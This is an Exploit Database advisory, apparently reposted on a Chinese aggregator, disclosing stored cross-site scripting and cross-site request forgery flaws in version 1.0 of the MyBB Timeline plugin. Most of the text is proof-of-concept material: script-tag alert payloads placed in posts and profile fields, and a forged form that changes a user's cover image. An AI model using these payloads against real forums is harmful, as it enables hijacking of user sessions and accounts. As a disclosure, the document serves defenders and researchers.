MyBB Timeline Plugin 1.0 – Persistent Cross-Site Scripting

• Exploit Database
• 14 阅读

• 作者： 0xB9
  日期： 2021-01-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49467/

• # Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
  # Date: 1/21/2021
  # Author: 0xB9
  # Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
  # Version: 1.0
  # Tested on: Windows 10
  
  1. Description:
  MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
   
  
  2. Proof of Concept:
  
  ~ XSS via Thread/Post ~
  - Make a new thread or reply to an existing thread
  - Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
  Payload will execute when visiting your profile.
  
  ~ XSS via Location/Bio ~
  - Go to User CP -> Edit Profile
  - Input a payload in the Location/Bio <script>alert('XSS')</script>
  Payload will execute when visiting your profile.
  
  ~ CSRF ~
  <form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
  	<input type="text" name="coverpic" placeholder="Add Image URL" required="">
  	<input type="hidden" name="do_coverpic" value="change">
  	<input type="submit" value="Change">
  </form>